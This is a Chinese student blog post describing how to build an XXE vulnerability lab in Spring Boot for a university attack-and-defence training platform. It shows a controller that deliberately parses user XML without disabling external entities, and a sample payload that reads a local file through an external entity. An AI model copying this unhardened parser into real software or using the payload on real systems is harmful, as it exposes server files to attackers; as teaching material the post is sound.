山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(十六)-XXE(2)


前言:

继上一篇博客,本篇博客记录下XXE漏洞靶场的搭建过程及关键代码。


2、项目配置

编写 application.properties

spring.thymeleaf.prefix = classpath:/templates/

pom.xml 导入相关依赖

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.6.4</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>XXE_springboot</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>XXE_springboot</name>
    <description>XXE_springboot</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>


3、编写“XXE漏洞”后端代码

indexController.java:用于匹配 index 首界面,匹配到 index.html

package com.example.xxe_springboot.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

@Controller
public class indexController {
    @RequestMapping(value={"/","/index.html"})
    public String index(){
        return "index";
    }
    
}

index.html 中提交的数据,请求到 localhost:8080/xxe ,编写匹配 xxe 请求的 controller

XxeController.java

package com.example.xxe_springboot.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;

@RestController
public class XxeController {
    @RequestMapping("/xxe")
    public String xxe(@RequestParam(value = "xxe",required = false) String xxe) throws ParserConfigurationException, IOException, SAXException {
        /**
         *创建DOM解释器解析XML文件
         */
        // 把要解析的 XML 文档转化为输入流,以便 DOM 解析器解析它
        String anyString = xxe;
        InputStream is = new ByteArrayInputStream(anyString.getBytes(StandardCharsets.UTF_8));
        //InputStream is = new FileInputStream("D:\\note2.xml");
        //创建DOM模式的解析器工厂
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); 
        //调用工厂的方法得到DOM解析器对象
        DocumentBuilder builder = factory.newDocumentBuilder(); 
        //调用 DOM 解析器对象的 parse() 方法解析 XML 文档,得到代表整个文档的 Document 对象
        Document doc = builder.parse(is);
        //根据元素名称获取元素值
        NodeList nodeList = doc.getElementsByTagName("from");
        
        System.out.println(nodeList.item(0).getTextContent());
        
        return "success";
    }
}

成功解析后返回到前端界面“success”,控制台输出读取文件内容,用于测试。


4、编写“XXE漏洞”前端代码

首先在主界面编写一个输入框,用于输入 payload,如果想构造其他场景也是可以的,例如登录界面等场景,但是我这里为了测试,就简单写了一个输入框,毕竟目的不是写一个前端,关键在于后端实现,漏洞场景的复现。

index.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>XXE</title>
</head>
<body>
    
<p>这是一个XXE漏洞环境,试着构造payload读取D://XXE.txt</p>
    
<form action="http://localhost:8080/xxe" method="get">
    payload: <input type="text" name="xxe" />
    <input type="submit" value="go" />
</form>
    
</body>
</html>

5、运行测试

启动项目:

在这里插入图片描述

访问主界面:

在这里插入图片描述

payload:

<?xml version="1.0"?>
<!DOCTYPE note [
        <!ENTITY myentity  SYSTEM  "file:///D:/XXE.txt">
        ]>
<note>
    <to>Tove</to>
    <from>&myentity;</from>
    <heading>Reminder</heading>
    <body>Don't forget me this weekend</body>
</note>

在这里插入图片描述

返回结果:

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

陌兮_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值